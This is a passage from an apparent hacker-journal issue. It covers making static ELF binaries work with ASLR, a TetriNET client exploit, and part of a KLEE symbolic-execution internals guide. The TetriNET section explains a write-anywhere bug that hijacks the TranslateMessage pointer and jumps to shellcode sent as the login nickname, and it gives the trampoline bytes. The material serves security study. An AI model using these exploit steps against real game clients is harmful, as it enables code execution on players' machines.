Alas, a quick look at the binary with objdump will prove that most of the code is not using IP relative addressing and is not truly PIC. The PIC version of the glibc init routines like _start lives in /usr/lib/x86_64-linux-gnu/Scrt1.o, so we may have to start thinking outside the box a bit about what a statically linked executable really is. That is, we might take the -static flag out of the equation and begin working from scratch!

Perhaps test2.c should have both a _start() and a main(), as shown in Figure 23. _start() should have no code in it and use __attribute__((weak)) so that the _start() routine in Scrt1.o can override it. Or we can compile

    } else if (loc->elf_ex.e_type == ET_DYN) {
            /* Try and get dynamic programs out of the way of the
             * default mmap base, as well as whatever program they
             * might try to exec. This is because the brk will
             * follow the loader, and is not movable. */
            load_bias = ELF_ET_DYN_BASE - vaddr;
            if (current->flags & PF_RANDOMIZE)
                    load_bias += arch_mmap_rnd();

    if (!load_addr_set) {
            load_addr_set = 1;
            load_addr = (elf_ppnt->p_vaddr - elf_ppnt->p_offset);
            if (loc->elf_ex.e_type == ET_DYN) {
                    load_bias += error -
                            ELF_PAGESTART(load_bias + vaddr);
                    load_addr += load_bias;
                    reloc_func_desc = load_bias;
            }
    }

Figure 22. src/linux/fs/binfmt_elf.c

Diet Libc34 with IP relative addressing, using it instead of glibc for simplicity. There are multiple possibilities, but the primary idea is to start thinking outside of the box. So for the sake of a PoC here is a program that simply does nothing but check if argc is larger than one and then increments a variable in a loop every other iteration. We will demonstrate how ASLR works on it. It uses _start() as its main(), and the compiler options are shown below.

    $ gcc -nostdlib -fPIC test2.c -o test2
    $ ./test2 arg1

    $ pmap `pidof test2`
    17370: ./test2 arg1
    0000000000400000      4K r-x-- test2
    0000000000601000      4K rw--- test2
    00007ffcefcca000    132K rw--- [ stack ]
    00007ffcefd20000      8K r---- [ anon ]
    00007ffcefd22000      8K r-x-- [ anon ]
    ffffffffff600000      4K r-x-- [ anon ]
     total              160K
    $

ASLR is not present, and the address space is just as expected on a 64-bit ELF binary in Linux. So let’s run static_to_dyn.c on it, and then try again.

    $ ./static_to_dyn test2
    $ ./test2 arg1

    $ pmap `pidof test2`
    17622: ./test2 arg1
    0000565271e41000      4K r-x-- test2
    0000565272042000      4K rw--- test2
    00007ffc28fda000    132K rw--- [ stack ]
    00007ffc28ffc000      8K r---- [ anon ]
    00007ffc28ffe000      8K r-x-- [ anon ]
    ffffffffff600000      4K r-x-- [ anon ]
     total              160K

Now notice that the text and data segments for test2 are mapped to a random address space. Now we are talking! The rest of the homework should be fairly straightforward. Extrapolate upon this work and find more creative solutions until the GNU folks have the time to address the issues with some more elegance than what we can do using trickery and instrumentation.
34 unzip pocorgtfo18.pdf dietlibc.tar.bz2

    /* Make sure we have a data segment for testing purposes */
    static int test_dummy = 5;

    int _start() {
        int argc;
        long *args;
        long *rbp;
        int i;
        int j = 0;

        /* Extract argc from stack */
        asm __volatile__("mov 8(%%rbp), %%rcx" : "=c"(argc));

        /* Extract argv from stack */
        asm __volatile__("lea 16(%%rbp), %%rcx" : "=c"(args));

        /* Busy-loop when at least one argument is given, as in "./test2 arg1" */
        if (argc > 1) {
            for (i = 0; i < 100000000000; i++)
                if (i % 2 == 0)
                    j++;
        }
        return 0;
    }

Figure 23. First Draft of test2.c

Improving Static Linking Techniques

Since we are compiling statically by simply cutting glibc out of the equation with the -nostdlib compiler flag, we must consider that things we take for granted, such as TLS and system call wrappers, must be manually coded and linked. One potential solution I mentioned earlier is to compile dietlibc with IP relative addressing mode, and simply link your code to it with -nostdlib. Figure 24 is an updated version of test2.c which prints the command line arguments.

Now we are actually building a statically linked binary that can get command line args, and call statically linked in functions from Diet Libc.35

    $ gcc -nostdlib -c -fPIC test2.c -o test2.o
    $ gcc -nostdlib test2.o \
        /usr/lib/diet/lib-x86_64/libc.a -o test2
    $ ./test2 arg1 arg2
    ./test2
    arg1
    arg2
    $

Now we can run static_to_dyn from Figure 25 to enforce ASLR.36 The first two segments are happily randomized!

    $ ./static_to_dyn test2
    $ ./test2 foo bar
    $ pmap `pidof test2`
    24411: ./test2 foo bar
    0000564cf542f000      8K r-x-- test2
    0000564cf5631000      4K rw--- test2
    00007ffe98c8e000    132K rw--- [ stack ]
    00007ffe98d55000      8K r---- [ anon ]
    00007ffe98d57000      8K r-x-- [ anon ]
    ffffffffff600000      4K r-x-- [ anon ]
    total 164K
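
Eyeballing pmap output works, but the comparison is easy to script. Here is a small Python sketch, assuming the four-column row layout seen in the pmap listings of this article; the helper name mapping_bases is hypothetical, and the two sample strings simply repeat the test2 rows from the non-randomized and randomized runs.

```python
def mapping_bases(pmap_output, name):
    """Return the start addresses of all mappings whose last column is `name`."""
    bases = []
    for line in pmap_output.splitlines():
        fields = line.split()
        # A file-backed row looks like: <hex address> <size>K <perms> <name>
        if len(fields) == 4 and fields[3] == name:
            bases.append(int(fields[0], 16))
    return bases

# Rows copied from the pmap listings before and after running static_to_dyn.
BEFORE = """\
0000000000400000 4K r-x-- test2
0000000000601000 4K rw--- test2
"""
AFTER = """\
0000564cf542f000 8K r-x-- test2
0000564cf5631000 4K rw--- test2
"""

text_before = mapping_bases(BEFORE, "test2")[0]
text_after = mapping_bases(AFTER, "test2")[0]
print(hex(text_before))           # 0x400000
print(hex(text_after))            # 0x564cf542f000
print(text_after != text_before)  # True
```

Running the binary twice and comparing the first base of each run is the more convincing check, since a single different address only shows that the fixed 0x400000 base is gone.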

35 Note that first I downloaded the dietlibc source code and edited the Makefile to use the -fPIC flag which will enforce IP-relative addressing within dietlibc.


36 unzip pocorgtfo18.pdf static_to_dyn.c

    #include <stdio.h>
    #include <stdlib.h> /* exit() */
    #include <unistd.h> /* sleep() */

    /* Make sure we have a data segment for testing purposes */
    static int test_dummy = 5;

    int _start() {
        int argc;
        long *args;
        long *rbp;
        int i;
        int j = 0;

        /* Extract argc from stack */
        asm __volatile__("mov 8(%%rbp), %%rcx" : "=c"(argc));

        /* Extract argv from stack */
        asm __volatile__("lea 16(%%rbp), %%rcx" : "=c"(args));

        for (i = 0; i < argc; i++) {
            sleep(10); /* long enough for us to verify ASLR */
            printf("%s\n", (char *)args[i]); /* each slot holds a char pointer */
        }
        exit(0);
    }

Figure 24. Updated test2.c.

Summary
In this paper we have cleared up some misconceptions surrounding the attack surface of a statically linked executable, and which security mitigations are lacking by default. PLT/GOT attacks do exist against statically linked ELF executables, but RELRO and ASLR defenses do not.
We presented a prototype tool for enabling full RELRO on statically linked executables. We also engaged in some work to create a hybridized approach that combines linking techniques with instrumentation, and together were able to propose a solution for making static binaries that work with ASLR. Our solution for ASLR is to first build the binary statically, without glibc.

    #define _GNU_SOURCE
    #include <stdio.h>
    #include <stdlib.h>
    #include <elf.h>
    #include <sys/types.h>
    #include <search.h>
    #include <sys/time.h>
    #include <fcntl.h>
    #include <link.h>
    #include <sys/stat.h>
    #include <sys/mman.h>

    #define HUGE_PAGE 0x200000

    int main(int argc, char **argv) {
        ElfW(Ehdr) *ehdr;
        ElfW(Phdr) *phdr;
        ElfW(Shdr) *shdr;
        uint8_t *mem;
        int fd;
        int i;
        struct stat st;
        uint64_t old_base;      /* original text base */
        uint64_t new_data_base; /* new data base */
        char *StringTable;

        fd = open(argv[1], O_RDWR);
        if (fd < 0) {
            perror("open");
            goto fail;
        }

        fstat(fd, &st);

        mem = mmap(NULL, st.st_size, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
        if (mem == MAP_FAILED) {
            perror("mmap");
            goto fail;
        }

        ehdr = (ElfW(Ehdr) *)mem;
        phdr = (ElfW(Phdr) *)&mem[ehdr->e_phoff];
        shdr = (ElfW(Shdr) *)&mem[ehdr->e_shoff];
        StringTable = (char *)&mem[shdr[ehdr->e_shstrndx].sh_offset];

        printf("Marking e_type to ET_DYN\n");
        ehdr->e_type = ET_DYN;

        printf("Updating PT_LOAD segments to become relocatable from base 0\n");

        for (i = 0; i < ehdr->e_phnum; i++) {
            if (phdr[i].p_type == PT_LOAD && phdr[i].p_offset == 0) {
                old_base = phdr[i].p_vaddr;
                phdr[i].p_vaddr = 0UL;
                phdr[i].p_paddr = 0UL;
                phdr[i + 1].p_vaddr = HUGE_PAGE + phdr[i + 1].p_offset;
                phdr[i + 1].p_paddr = HUGE_PAGE + phdr[i + 1].p_offset;
            } else if (phdr[i].p_type == PT_NOTE) {
                phdr[i].p_vaddr = phdr[i].p_offset;
                phdr[i].p_paddr = phdr[i].p_offset;
            } else if (phdr[i].p_type == PT_TLS) {
                phdr[i].p_vaddr = HUGE_PAGE + phdr[i].p_offset;
                phdr[i].p_paddr = HUGE_PAGE + phdr[i].p_offset;
                new_data_base = phdr[i].p_vaddr;
            }
        }
        /*
         * If we don't update the section headers to reflect the new address
         * space then GDB and objdump will be broken with this binary.
         */
        for (i = 0; i < ehdr->e_shnum; i++) {
            if (!(shdr[i].sh_flags & SHF_ALLOC))
                continue;
            shdr[i].sh_addr = (shdr[i].sh_addr < old_base + HUGE_PAGE)
                ? 0UL + shdr[i].sh_offset
                : new_data_base + shdr[i].sh_offset;
            printf("Setting %s sh_addr to %#lx\n",
                   &StringTable[shdr[i].sh_name], shdr[i].sh_addr);
        }
        printf("Setting new entry point: %#lx\n", ehdr->e_entry - old_base);
        ehdr->e_entry = ehdr->e_entry - old_base;
        munmap(mem, st.st_size);
        exit(0);
    fail:
        exit(-1);
    }

Figure 25. static_to_dyn.c
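
The address arithmetic in Figure 25 is compact enough to replay by hand. The Python sketch below mirrors only that arithmetic for a binary with one text and one data PT_LOAD; the function name rebase and the sample values for old_base, entry and data_offset are hypothetical, chosen to resemble a small non-PIE static binary rather than measured from test2.

```python
HUGE_PAGE = 0x200000  # same constant as in static_to_dyn.c

def rebase(old_base, entry, data_offset):
    """Mirror the address arithmetic of static_to_dyn.c for a two-segment binary.

    old_base    -- original p_vaddr of the text PT_LOAD (the one at file offset 0)
    entry       -- original e_entry
    data_offset -- p_offset of the PT_LOAD that follows the text segment
    """
    return {
        "text_vaddr": 0,                        # text now starts at base 0
        "data_vaddr": HUGE_PAGE + data_offset,  # data sits one huge page above
        "entry": entry - old_base,              # entry becomes a plain offset
    }

# Hypothetical values, for illustration only.
layout = rebase(old_base=0x400000, entry=0x4000F0, data_offset=0x1000)
for key, value in layout.items():
    print(f"{key:10s} {value:#x}")
```

With these made-up inputs the data segment ends up 0x201000 above the text, which is at least consistent with the gap between the two test2 mappings in the randomized pmap listing (0x565272042000 - 0x565271e41000 = 0x201000). Since the kernel adds the same load_bias to every segment, only these relative values matter.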

18:07 A Trivial Exploit for TetriNET; or,
Update Player TranslateMessage to Level Shellcode.
by John Laky and Kyle Hanslovan

Lo, the year was 1997 and humanity completes its greatest feat yet: nearly thirty years after NASA delivers the lunar landings, St0rmCat releases TetriNET, a gritty multiplayer reboot of the gaming monolith Tetris, bringing capitalists and communists together in competitive, adrenaline-pumping, line-annihilating, block-crushing action, all set to a period-appropriate synthetic soundtrack that would make Gorbachev blush. TetriNET holds the dubious distinction of hosting one of the most hilarious bugs ever discovered, where sending an offset and overwritable address in a stringified game state update will jump to any address of our choosing.

The TetriNET protocol is largely a trusted two-way ASCII-based message system with a special binascii encoded handshake for login.37 Although there is an official binary (v1.13), this protocol enjoyed several implementations that aid in its reverse engineering, including a Python server/client implementation.38 Authenticating to a TetriNET server uses a custom encoding scheme, a rotating xor derived from the IP address of the server. One could spend ages reversing the C++ binary for this algorithm, but The Great Segfault punishes wasted time and effort, and our brethren at Pytrinet already have a Python implementation.

    # login string looks like
    # ``<nick> <version> <serverip>''
    # ex: TestUser 1.13 127.0.0.1
    def encode(nick, version, ip):
        dec = 2
        s = 'tetrisstart %s %s' % (nick, version)
        h = str(54*ip[0] + 41*ip[1]
                + 29*ip[2] + 17*ip[3])
        encodeS = dec2hex(dec)

        for i in range(len(s)):
            dec = ((dec + ord(s[i])) % 255) ^ ord(h[i % len(h)])
            s2 = dec2hex(dec)
            encodeS += s2

        return encodeS

One of the many updates a TetriNET client can send to the server is the level update, a 0xFF-terminated string of the form:

    lvl <player number> <level number>\xff

The documentation states acceptable values for the player number range 1-6, a caveat that should pique the interest of even nascent bit-twiddlers. Predictably, sending a player number of 0x20 and a level of 0x00AABBCC crashes the binary through a write-anywhere bug. The only question now is which is easier: overwriting a return address on the stack or stomping on a function pointer in a v-table or something. A brief search for the landing zone yields the answer:
    00454314: 77f1ecce 77f1ad23 77f15fe0 77f1700a 77f1d969
    00454328: 00aabbcc 77f27090 77f16f79 00000000 7e429766
    0045433c: 7e43ee5d 7e41940c 7e44faf5 7e42fbbd 7e42aeab
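
Spotting the marker by eye is easy in three rows, less so in a full memory dump. As a rough Python sketch of the same search, assuming the dump format shown above (an address, a colon, then 4-byte words in hex), the hypothetical helper find_dword reports where a given dword sits:

```python
DUMP = """\
00454314: 77f1ecce 77f1ad23 77f15fe0 77f1700a 77f1d969
00454328: 00aabbcc 77f27090 77f16f79 00000000 7e429766
0045433c: 7e43ee5d 7e41940c 7e44faf5 7e42fbbd 7e42aeab
"""

def find_dword(dump, needle):
    """Return the addresses at which `needle` appears in a hex dump of dwords."""
    hits = []
    for line in dump.splitlines():
        addr_text, _, words = line.partition(":")
        base = int(addr_text, 16)
        for index, word in enumerate(words.split()):
            if int(word, 16) == needle:
                hits.append(base + 4 * index)  # each column is one 4-byte dword
    return hits

print([hex(a) for a in find_dword(DUMP, 0x00AABBCC)])  # ['0x454328']
```

The level value 0x00AABBCC was chosen precisely because it is unlikely to occur by accident, so a single hit is a good sign that the write landed there.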

37 unzip pocorgtfo18.pdf iTetrinet-wiki.zip


38 http://pytrinet.ddmr.nl/

Praise the Stack! We landed inside the import table.

    .idata:00454324
    ; HBRUSH __stdcall
    ; CreateBrushIndirect(const LOGBRUSH *)
    extrn __imp_CreateBrushIndirect:dword
    ; DATA XREF: CreateBrushIndirect↑r

    .idata:00454328
    ; HBITMAP __stdcall
    ; CreateBitmap(int, int, UINT, UINT,
    ; const void *)
    extrn __imp_CreateBitmap:dword
    ; DATA XREF: CreateBitmap↑r

    .idata:0045432C
    ; HENHMETAFILE __stdcall
    ; CopyEnhMetaFileA(HENHMETAFILE, LPCSTR)
    extrn __imp_CopyEnhMetaFileA:dword
    ; DATA XREF: CopyEnhMetaFileA↑r

Now we have a plan to overwrite an often-called function pointer with a useful address, but which one? There are a few good candidates, and a look at the imports reveals a few of particular interest: PeekMessageA, DispatchMessageA, and TranslateMessage, indicating TetriNET relies on Windows message queues for processing. Because these are usually handled asynchronously and applications receive a deluge of messages during normal operation, these are perfect candidates for corruption. Indeed, TetriNET implements a PeekMessageA / TranslateMessage / DispatchMessageA subroutine.

    sub_424620      sub_424620 proc near
    sub_424620
    sub_424620      var_20 = byte ptr -20h
    sub_424620      Msg = MSG ptr -1Ch
    sub_424620
    sub_424620      push ebx
    sub_424620+1    push esi
    sub_424620+2    add esp, 0FFFFFFE0h
    sub_424620+5    mov esi, eax
    sub_424620+7    xor ebx, ebx
    sub_424620+9    push 1 ; wRemoveMsg
    sub_424620+B    push 0 ; wMsgFilterMax
    sub_424620+D    push 0 ; wMsgFilterMin
    sub_424620+F    push 0 ; hWnd
    sub_424620+11   lea eax, [esp+30h+Msg]
    sub_424620+15   push eax ; lpMsg
    sub_424620+16   call PeekMessageA
    sub_424620+1B   test eax, eax
    ...
    sub_424620+8E   lea eax, [esp+20h+Msg]
    sub_424620+92   push eax ; lpMsg
    sub_424620+93   call TranslateMessage << !!
    sub_424620+98   lea eax, [esp+20h+Msg]
    sub_424620+9C   push eax ; lpMsg
    sub_424620+9D   call DispatchMessageA
    sub_424620+A2   jmp short loc_4246C8

Adjusting our firing solution to overwrite the address of TranslateMessage (remember the vulnerable instruction multiplies the player number by the size of a pointer; scale the payload accordingly) and voila! EIP jumps to our provided level number.

Now, all we have to do is jump to some shellcode. This may be a little trickier than it seems at first glance.

The first option: with a stable write-anywhere bug, we could write shellcode into an rwx section and jump to it. Unfortunately, the level number that eventually becomes ebx in the vulnerable instruction is a signed double word, and only positive integers can be written without raising an error. We could hand-craft some clever shellcode that only uses bytes smaller than 0x80 in key locations, but there must be a better way.

The second option: we could attempt to write our shellcode three bytes at a time instead of four, working backward from the end of an RWX section, always writing double words with one positive-integer-compliant byte followed by three bytes of shellcode, always overwriting the useless byte of the last write. Alas, the vulnerable instruction enforces 4-byte aligned writes:

    0044B963 mov ds:dword_453F28[eax*4], ebx
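
The two constraints just described, 4-byte slots relative to dword_453F28 and positive signed values only, can be written down as a pair of checks. This is a minimal Python sketch built only from the instruction above; the names index_for and writable_value are invented for illustration, and treating "positive" as strictly greater than zero is an assumption.

```python
TABLE_BASE = 0x453F28  # dword_453F28 from the instruction at 0044B963
SLOT_SIZE = 4          # the [eax*4] scale factor

def index_for(target):
    """Return the eax value that makes the write land on `target`."""
    offset = target - TABLE_BASE
    if offset % SLOT_SIZE:
        raise ValueError("target is not 4-byte aligned relative to the table")
    return offset // SLOT_SIZE

def writable_value(value):
    """True if `value` is a positive signed 32-bit integer (assumed: > 0)."""
    return 0 < value < 0x80000000

print(hex(index_for(0x454328)))       # 0x100
print(writable_value(0x00AABBCC))     # True
print(writable_value(0x90909090))     # False, the sign bit is set
```

The index that reaches 0x00454328 comes out as 0x100, not the 0x20 that was sent as the player number. The text does not spell out how the player number is transformed before it ends up in eax, so that mapping is left open here; the sketch only covers the final address computation.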

The third option: we could patch either the positive-integer-compliant check or the vulnerable instruction to allow us to perform either of the first two options. Alas, the page containing this code is not writable.

    00401000 ; Segment type: Pure code
    00401000 ; Segment perms: Read/Execute

Suddenly, the Stack grants us a brief moment of clarity in our moment of desperation: because the login encoding accepts an arbitrary binary string as the nickname, all manner of shellcode can be passed as the nickname; all we have to do is find a way to jump to it. Surely, there must be a pointer somewhere in the data section to the nickname we can use to jump to it. After a brief search, we discover there is indeed a static value pointing to the login nickname in the heap. Now, we can write a small trampoline to load that pointer into a register and jump to it:

    0: a1 bc 37 45 00    mov eax, ds:0x4537bc
    5: ff e0             jmp eax

Voila! Login as shellcode, update your level to the trampoline, smash the pointer to TranslateMessage and pull the trigger on the windows message pump and rejoice in the shiny goodness of a running exploit. The Stack would be proud! While a host of vulnerabilities surely lie in wait betwixt the subroutines of tetrinet.exe, this vulnerability's shameless affair with the player is truly one for the ages.

Scripts and a reference tetrinet executable are attached to this PDF,39 and the editors of this fine journal have resurrected the abandoned website, http://tetrinet.us/.
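
For readers who want to poke at the pieces without the attached scripts, here is a small Python sketch of two of them: the trampoline bytes and the login encoding. It is not the authors' exploit. The dec2hex helper is not shown in the article, so the version below (two uppercase hex digits per value) is an assumption about Pytrinet's behavior, and the nickname is a plain printable string rather than shellcode, which would need byte-level handling that this sketch leaves out.

```python
import struct

NICK_PTR = 0x4537BC  # static pointer to the nickname, from the trampoline listing

def trampoline(ptr_addr):
    """Assemble `mov eax, ds:ptr_addr; jmp eax` for 32-bit x86."""
    return b"\xa1" + struct.pack("<I", ptr_addr) + b"\xff\xe0"

def dec2hex(n):
    # Assumption: two uppercase hex digits per value; Pytrinet's helper may differ.
    return "%02X" % n

def encode(nick, version, ip):
    """Login encoding as given earlier in the article, with `ip` as four ints."""
    dec = 2
    s = "tetrisstart %s %s" % (nick, version)
    h = str(54 * ip[0] + 41 * ip[1] + 29 * ip[2] + 17 * ip[3])
    out = dec2hex(dec)
    for i, ch in enumerate(s):
        dec = ((dec + ord(ch)) % 255) ^ ord(h[i % len(h)])
        out += dec2hex(dec)
    return out

print(trampoline(NICK_PTR).hex())  # a1bc374500ffe0
login = encode("TestUser", "1.13", [127, 0, 0, 1])
print(len(login), login[:2])       # 52 02
```

The trampoline output matches the seven bytes in the disassembly above. The encoded login is two hex digits for the seed value 2 followed by two per character of the 25-character "tetrisstart TestUser 1.13" string.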

39 unzip pocorgtfo18.pdf tetrinet.zip

18:08 A Guide to KLEE LLVM Execution Engine Internals
by Julien Vanegue

Greetings fellow neighbors!

It is my great pleasure to finally write my first article in PoC||GTFO after so many of you have contributed excellent content in the past dozens of issues that Pastor Laphroaig put together for our enjoyment. I have been waiting for this moment for some time, and been harassed a few times, to finally come up with something worthwhile. Given the high standards set upon all of us, I did not feel like rushing it. Instead, I bring to you today what I think will be a useful piece of text for many fellow hackers to use in the future. Apologies for any errors that may have slipped from my understanding, I am getting older after all, and my memory is not what it used to be. Not like it has ever been infallible but at least I used to remember where the cool kids hung out. This is my attempt at renewing the tradition of sharing knowledge through some more informal channels.

Today, I would like to talk to you about KLEE, an open source symbolic execution engine originally developed at Stanford University and now maintained at Imperial College in London. Symbolic Execution (SYMEX) stands somewhere between static analysis of programs and [dynamic] fuzz testing. While its theoretical foundations date back to the late seventies (King's paper), practical application of it waited until the late 2000s (such as SAGE40 at Microsoft Research) to finally become mainstream with KLEE in 2008. These tools have been used in practice to find thousands of security issues in software, going from simple NULL pointer dereferences, to out of bound reads or writes for both the heap and the stack, including use-after-free vulnerabilities and other type-state issues that can be easily defined using "asserts."

On one hand, symbolic execution is able to undergo concrete execution of the analyzed program and maintains a concrete store for variable values as the execution progresses, but it can also track path conditions using constraints. This can be used to verify the feasibility of a specific path. At the same time, a process tree (PTree) of nodes (PTreeNode) represents the state space as an ImmutableTree structure. The ImmutableTree implements a copy-on-write mechanism so that parts of the state (mostly variable values) that are shared across nodes don't have to be copied from state to state unless they are written to. This allows KLEE to scale better under memory pressure. Such state contains both a list of symbolic constraints that are known to be true in this state, as well as a concrete store for program variables on which constraints may or may not be applied (but that are nonetheless necessary so the program can execute in KLEE).

My goal in this article is not so much to show you how to use KLEE, which is well understood, but to bring you a tutorial on hacking KLEE internals. This will be useful if you want to add features or add support for specific analysis scenarios that you care about. I've spent hundreds of hours in KLEE internals and having such notes would have helped me in the beginning. I hope it helps you too.

Now let's get started.

Working with Constraints

Let's look at a simple C program as a motivator.

    #include <stdlib.h> /* atoi() */

    int fct(int a, int b) {
        int c = 0;
        if (a < b)
            c++;
        else
            c--;
        return c;
    }

    int main(int argc, char **argv) {
        if (argc != 3) return (-1);
        int a = atoi(argv[1]);
        int b = atoi(argv[2]);
        if (a < b)
            return (0);
        return fct(a, b);
    }

It is clear that the path starting in main and continuing into the true branch of the first if (a < b), the one inside fct, is infeasible. This is because any such path will actually have finished with a return (0) in the main function already. The way KLEE can track this is by listing constraints for the path conditions.

This is how it works: first KLEE executes some bootstrapping code before main takes control, then
40 unzip pocorgtfo18.pdf automatedwhiteboxfuzzing.pdf

starts executing the first LLVM instruction of the main function. Upon reaching the first if statement, KLEE forks the state space (via function Executor::fork). The left node has one more constraint (argc != 3) while the right node has constraint (argc == 3). KLEE eventually comes back to its main routine (Executor::run), adds the newly-generated states into the set of active states, and picks up a new state to continue analysis with.

Executor Class

The main class in KLEE is called the Executor class. It has many methods such as Executor::run(), which is the main method of the class. This is where the sets of added and removed states are manipulated to decide which state to visit next. Bear in mind that nothing guarantees that the next state picked by the Executor class will be the next state in the current path.

Figure 26 shows all of the LLVM instructions currently supported by KLEE.

• Call/Br/Ret: Control flow instructions. These are cases where the program counter (part of the state) may be modified by more than just the size of the current instruction. In the case of Call and Ret, a StackFrame object is created on call, where local variables are bound to the called function, and destroyed on return. Defining new variables may be achieved through the KLEE API bindObjectInState().

• Add/Sub/Mul/*S*/U*/*Or*: The Signed and Unsigned arithmetic instructions. The usual suspects including bit shifting operations as well.

• Cast operations (UItoFP, FPtoUI, IntToPtr, PtrToInt, BitCast, etc.): used to convert variables from one type to a variable of a different type.

• *Ext* instructions: these extend a variable to use a larger number of bits, for example 8b to 32b, sometimes carrying the sign bit or the zero bit.

• F* instructions: the floating point arithmetic instructions in KLEE. I don't myself do much floating point analysis and I tend not to modify these cases, however this is where to look if you're interested in that.

• Alloca: used to allocate memory of a desired size

• Load/Store: Memory access operations at a given address

• GetElementPtr: perform array or structure read/write at certain index

• PHI: This corresponds to the PHI function in the Static Single Assignment form (SSA) as defined in the literature.41

There are other instructions I am glossing over but you can refer to the LLVM reference manual for an exhaustive list.

So far the execution in KLEE has gone through Executor::run() -> Executor::executeInstruction() -> case ... but we have not looked at what these cases actually do in KLEE. This is handled by a class called the ExecutionState that is used to represent the state space.

ExecutionState Class

This class is declared in include/klee/ExecutionState.h and contains mostly two objects:

• AddressSpace: contains the list of all metadata for the process objects in this state, including global, local, and heap objects. The address space is basically made of an array of objects and routines to resolve concrete addresses to objects (via method AddressSpace::resolveOne to resolve one by picking up the first match, or method AddressSpace::resolve for resolving to a list of objects that may match). The AddressSpace object also contains a concrete store for objects where concrete values can be read and written to. This is useful when you're tracking a symbolic variable but suddenly need to concretize it to make an external concrete function call in libc or some other library that you haven't linked into your LLVM module.
41 unzip pocorgtfo18.pdf cytron.pdf

    $ grep -rni 'case Instruction::' lib/Core/
    lib/Core/Executor.cpp:2452: case Instruction::Ret: {
    lib/Core/Executor.cpp:2591: case Instruction::Br: {
    lib/Core/Executor.cpp:2619: case Instruction::Switch: {
    lib/Core/Executor.cpp:2731: case Instruction::Unreachable:
    lib/Core/Executor.cpp:2739: case Instruction::Invoke:
    lib/Core/Executor.cpp:2740: case Instruction::Call: {
    lib/Core/Executor.cpp:2987: case Instruction::PHI: {
    lib/Core/Executor.cpp:2995: case Instruction::Select: {
    lib/Core/Executor.cpp:3006: case Instruction::VAArg:
    lib/Core/Executor.cpp:3012: case Instruction::Add: {
    lib/Core/Executor.cpp:3019: case Instruction::Sub: {
    lib/Core/Executor.cpp:3026: case Instruction::Mul: {
    lib/Core/Executor.cpp:3033: case Instruction::UDiv: {
    lib/Core/Executor.cpp:3041: case Instruction::SDiv: {
    lib/Core/Executor.cpp:3049: case Instruction::URem: {
    lib/Core/Executor.cpp:3057: case Instruction::SRem: {
    lib/Core/Executor.cpp:3065: case Instruction::And: {
    lib/Core/Executor.cpp:3073: case Instruction::Or: {
    lib/Core/Executor.cpp:3081: case Instruction::Xor: {
    lib/Core/Executor.cpp:3089: case Instruction::Shl: {
    lib/Core/Executor.cpp:3097: case Instruction::LShr: {
    lib/Core/Executor.cpp:3105: case Instruction::AShr: {
    lib/Core/Executor.cpp:3115: case Instruction::ICmp: {
    lib/Core/Executor.cpp:3207: case Instruction::Alloca: {
    lib/Core/Executor.cpp:3221: case Instruction::Load: {
    lib/Core/Executor.cpp:3226: case Instruction::Store: {
    lib/Core/Executor.cpp:3234: case Instruction::GetElementPtr: {
    lib/Core/Executor.cpp:3289: case Instruction::Trunc: {
    lib/Core/Executor.cpp:3298: case Instruction::ZExt: {
    lib/Core/Executor.cpp:3306: case Instruction::SExt: {
    lib/Core/Executor.cpp:3315: case Instruction::IntToPtr: {
    lib/Core/Executor.cpp:3324: case Instruction::PtrToInt: {
    lib/Core/Executor.cpp:3334: case Instruction::BitCast: {
    lib/Core/Executor.cpp:3343: case Instruction::FAdd: {
    lib/Core/Executor.cpp:3358: case Instruction::FSub: {
    lib/Core/Executor.cpp:3372: case Instruction::FMul: {
    lib/Core/Executor.cpp:3387: case Instruction::FDiv: {
    lib/Core/Executor.cpp:3402: case Instruction::FRem: {
    lib/Core/Executor.cpp:3417: case Instruction::FPTrunc: {
    lib/Core/Executor.cpp:3434: case Instruction::FPExt: {
    lib/Core/Executor.cpp:3450: case Instruction::FPToUI: {
    lib/Core/Executor.cpp:3467: case Instruction::FPToSI: {
    lib/Core/Executor.cpp:3484: case Instruction::UIToFP: {
    lib/Core/Executor.cpp:3500: case Instruction::SIToFP: {
    lib/Core/Executor.cpp:3516: case Instruction::FCmp: {
    lib/Core/Executor.cpp:3608: case Instruction::InsertValue: {
    lib/Core/Executor.cpp:3635: case Instruction::ExtractValue: {
    lib/Core/Executor.cpp:3645: case Instruction::Fence: {
    lib/Core/Executor.cpp:3649: case Instruction::InsertElement: {
    lib/Core/Executor.cpp:3691: case Instruction::ExtractElement: {
    lib/Core/Executor.cpp:3724: case Instruction::ShuffleVector:

Figure 26. LLVM Instructions supported by KLEE

• ConstraintManager: contains the list of all symbolic constraints available in this state. By default, KLEE stores all path conditions in the constraint manager for that state, but it can also be used to add more constraints of your choice. Not all objects in the AddressSpace may be subject to constraints, which is left to the discretion of the KLEE programmer. Verifying that these constraints are satisfiable can be done by calling the solver->mustBeTrue() or solver->mayBeTrue() methods, which is a solver-independent API provided in KLEE to call SMT or Z3 independently of the low-level solver API. This comes in handy when you want to check the feasibility of certain variable values during analysis.

Every time the ::fork() method is called, one execution state is split into two where possibly more constraints or different values have been inserted in these objects. One may call the Executor::branch() method directly to create a new state from the existing state without creating a state pair as fork would do. This is useful when you only want to add a subcase without following the exact fork expectations.

Executor::executeMemoryOperation(), MemoryObject and ObjectState

Two important classes in KLEE are MemoryObject and ObjectState, both defined in lib/klee/Core/Memory.h.

The MemoryObject class is used to represent an object such as a buffer that has a base address and a size. When accessing such an object, typically via the Executor::executeMemoryOperation() method, KLEE automatically ensures that accesses are in bounds based on known base address, desired offset, and object size information. The MemoryObject class provides a few handy methods:

    (...)
    ref<ConstantExpr> getBaseExpr()
    ref<ConstantExpr> getSizeExpr()
    ref<Expr> getOffsetExpr(ref<Expr> pointer)
    ref<Expr> getBoundsCheckPointer(ref<Expr> pointer)
    ref<Expr> getBoundsCheckPointer(ref<Expr> pointer, unsigned bytes)
    ref<Expr> getBoundsCheckOffset(ref<Expr> offset)
    ref<Expr> getBoundsCheckOffset(ref<Expr> offset, unsigned bytes)

Using these methods, checking for boundary conditions is child's play. It becomes more interesting when symbolics are used, as the conditions that must be checked involve more than constants, depending on whether the base address, the offset or the index are symbolic values (or possibly depending on the source data for certain analyses, for example taint analysis).

While the MemoryObject somehow takes care of the spatial integrity of the object, the ObjectState class is used to access the memory value itself in the state. Its most useful methods are:

    // return bytes read.
    ref<Expr> read(ref<Expr> offset, Expr::Width width);
    ref<Expr> read(unsigned offset, Expr::Width width);
    ref<Expr> read8(unsigned offset);

    // return bytes written.
    void write(unsigned offset, ref<Expr> value);
    void write(ref<Expr> offset, ref<Expr> value);
